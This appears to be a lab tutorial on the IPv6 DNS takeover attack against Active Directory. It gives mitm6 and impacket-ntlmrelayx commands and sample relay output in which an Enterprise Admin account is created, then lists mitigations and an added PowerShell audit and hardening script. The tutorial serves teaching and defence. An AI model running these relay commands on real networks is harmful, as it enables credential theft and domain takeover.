Attacks - Active Directory Hacking

IPv6 Attack

TL;DR

The IPv6 attack exploits Windows' preference for IPv6 over IPv4 and the fact that IPv6 is enabled by default on Windows hosts. Even if IPv6 is not used in the network, Windows will still attempt to use it, which allows attackers to perform man-in-the-middle attacks. We'll use the mitm6 tool to perform an IPv6 DNS takeover attack:

sudo mitm6 -d lab.local

Then use ntlmrelayx to capture and relay authentication:

impacket-ntlmrelayx -6 -t ldaps://dc01.lab.local -wh fakewpad.lab.local -l lootme

What is the IPv6 Attack?

The IPv6 attack exploits Windows' preference for IPv6 over IPv4 and the fact that IPv6 is enabled by default on Windows hosts. Even if IPv6 is not used in the network, Windows will still attempt to use it, which allows attackers to perform man-in-the-middle attacks.

How does it work?

  1. Windows networks have IPv6 enabled by default, even if not in use
  2. When a DNS request is made, Windows queries for both IPv4 and IPv6 addresses
  3. Attacker sets up a rogue IPv6 DNS server
  4. Windows prefers IPv6 over IPv4, so it uses the attacker’s DNS server
  5. Attacker can intercept traffic and perform man-in-the-middle attacks
  6. Authentication credentials can be captured during this process

Demo Time

We'll use the mitm6 tool to perform an IPv6 DNS takeover attack:

sudo mitm6 -d lab.local

Then use ntlmrelayx to capture and relay authentication:

impacket-ntlmrelayx -6 -t ldaps://dc01.lab.local -wh fakewpad.lab.local -l lootme

When a user logs in or reboots their machine, you’ll see authentication attempts being captured and relayed.

If the administrator logs in, you’ll see something like this:

[*] User privileges found: Create user
[*] User privileges found: Adding user to a privileged group (Enterprise Admins)
[*] User privileges found: Modifying domain ACL
[*] adding new user with username: NgoqUace and password: &1kA386F%*! result: OK

Now we have a username and password with Enterprise Admin privileges!

Note: This attack is most effective during work hours when users are active; it only needs a trigger event such as a system restart or a network reconnection to succeed.

Mitigation

To protect against IPv6 Attacks:

  • Disable IPv6 if not in use
  • Disable WPAD if not in use via Group Policy and by disabling the WinHttpAutoProxySvc service
  • Use IPv6 firewall rules
  • Enable LDAP signing and LDAP channel binding; this is the only mitigation for relaying to LDAP and LDAPS
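
The following PowerShell script is an added example for this page; it is not code from the original write-up or from the mitm6 or impacket projects. It ties the "How does it work?" list to the mitigation list: it first looks for the footprints a DHCPv6/DNS takeover leaves on a victim host (a DHCPv6-assigned address and an IPv6 DNS server), then reports the state of each mitigation above, and applies them only when run with -Remediate. It assumes an IPv4-only network, so any DHCPv6 lease or IPv6 DNS server is treated as suspicious; the firewall rule name is a constructed label, and the UDP 546 port and the NTDS registry values are standard Windows settings rather than anything taken from the page.

```powershell
# Added example (not from the original page or from mitm6/impacket).
# Audit one Windows host for IPv6 takeover footprints and mitigation posture.
# Assumption: the network is IPv4-only, so any DHCPv6 lease or IPv6 DNS
# server is suspicious. Changes are applied only with -Remediate.

#Requires -RunAsAdministrator
param([switch]$Remediate)

$findings = @()

# 1. Footprints of a takeover in progress: mitm6 answers DHCPv6 and hands the
#    victim its own address as the IPv6 DNS server.
$dhcp6 = Get-NetIPAddress -AddressFamily IPv6 -PrefixOrigin Dhcp -ErrorAction SilentlyContinue
foreach ($a in $dhcp6) {
    $findings += "SUSPICIOUS: DHCPv6 lease $($a.IPAddress) on '$($a.InterfaceAlias)'"
}
$dns6 = Get-DnsClientServerAddress -AddressFamily IPv6 |
    Where-Object { $_.ServerAddresses.Count -gt 0 }
foreach ($d in $dns6) {
    $findings += "SUSPICIOUS: IPv6 DNS server(s) $($d.ServerAddresses -join ', ') on '$($d.InterfaceAlias)'"
}

# 2. Mitigation: IPv6 still bound to an adapter
$bound = Get-NetAdapterBinding -ComponentID ms_tcpip6 | Where-Object Enabled
foreach ($b in $bound) {
    $findings += "IPv6 is enabled on adapter '$($b.Name)'"
    if ($Remediate) { Disable-NetAdapterBinding -Name $b.Name -ComponentID ms_tcpip6 }
}

# 3. Mitigation: WPAD. WinHttpAutoProxySvc is a protected service on current
#    Windows builds, so Set-Service cannot disable it; set its Start value to
#    4 (disabled) in the registry instead. Takes effect after a reboot.
$wpadKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\WinHttpAutoProxySvc'
$wpadStart = (Get-ItemProperty -Path $wpadKey -ErrorAction SilentlyContinue).Start
if ($wpadStart -ne 4) {
    $findings += "WinHttpAutoProxySvc is not disabled (Start=$wpadStart)"
    if ($Remediate) { Set-ItemProperty -Path $wpadKey -Name Start -Value 4 }
}

# 4. Mitigation: IPv6 firewall rule. DHCPv6 clients receive replies on UDP 546;
#    an explicit Block rule takes precedence over the built-in Allow rule.
$ruleName = 'Block inbound DHCPv6 (audit example)'   # constructed label
if (-not (Get-NetFirewallRule -DisplayName $ruleName -ErrorAction SilentlyContinue)) {
    $findings += "No block rule for inbound DHCPv6 (UDP 546)"
    if ($Remediate) {
        New-NetFirewallRule -DisplayName $ruleName -Direction Inbound -Protocol UDP `
            -LocalPort 546 -Action Block -Profile Any | Out-Null
    }
}

# 5. Mitigation (domain controllers only): LDAP signing and channel binding.
#    LDAPServerIntegrity 2 = require signing; LdapEnforceChannelBinding 2 = always.
#    In a domain these are normally set by the matching Group Policy settings.
$ntds = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters'
if (Test-Path $ntds) {
    $p = Get-ItemProperty -Path $ntds
    if ($p.LDAPServerIntegrity -ne 2) {
        $findings += "LDAP signing not required (LDAPServerIntegrity=$($p.LDAPServerIntegrity))"
        if ($Remediate) { Set-ItemProperty -Path $ntds -Name LDAPServerIntegrity -Value 2 }
    }
    if ($p.LdapEnforceChannelBinding -ne 2) {
        $findings += "LDAP channel binding not enforced (LdapEnforceChannelBinding=$($p.LdapEnforceChannelBinding))"
        if ($Remediate) { Set-ItemProperty -Path $ntds -Name LdapEnforceChannelBinding -Value 2 }
    }
}

if ($findings.Count -eq 0) {
    Write-Output "No findings."
} else {
    foreach ($f in $findings) { Write-Output $f }
}
```

Run it once without switches to get a report (the SUSPICIOUS lines are the ones worth an incident ticket, since a host that never used IPv6 has no business holding a DHCPv6 lease or an IPv6 resolver), then with -Remediate on a test host before rolling the equivalent settings out through Group Policy, which is the authoritative place for the WPAD and LDAP settings in a domain.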